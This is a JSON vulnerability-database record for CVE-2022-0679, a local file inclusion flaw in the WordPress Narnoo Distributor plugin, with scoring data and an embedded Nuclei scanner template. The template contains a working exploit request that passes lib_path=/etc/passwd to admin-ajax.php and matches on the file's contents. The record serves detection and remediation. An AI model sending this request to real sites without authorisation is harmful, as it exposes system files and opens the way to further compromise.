{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0679/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0679/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0679/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0679/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0679/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0679"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0679"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.4783,
      "kev": false,
      "percentile": 0.98798
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-0679.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-0679\n\ninfo:\n  name: WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion\n  author: Veshraj\n  severity: critical\n  description: |\n    WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n  impact: |\n    The vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n  remediation: |\n    Update to the latest version of the WordPress Narnoo Distributor plugin (>=2.5.2) to mitigate the LFI vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/0ea79eb1-6561-4c21-a20b-a1870863b0a8\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0679\n    - https://github.com/cyllective/CVEs\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-0679\n    cwe-id: CWE-22\n    epss-score: 0.4783\n    epss-percentile: 0.98798\n    cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: narnoo_distributor_project\n    product: narnoo_distributor\n    framework: wordpress\n  tags: cve,cve2022,narnoo-distributor,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi,narnoo_distributor_project,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        X-Requested-With: XMLHttpRequest\n\n        action=narnoo_distributor_lib_request&lib_path=/etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022038d2a9b571f0f7938fee15c075a3e00bd932a0a806cda0c8d6a730faad3a247c0220030d178122fc1ce0e4eea6de47b3e4c10cb5cb3ce91801addde6f9319749b23f:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-0679"
}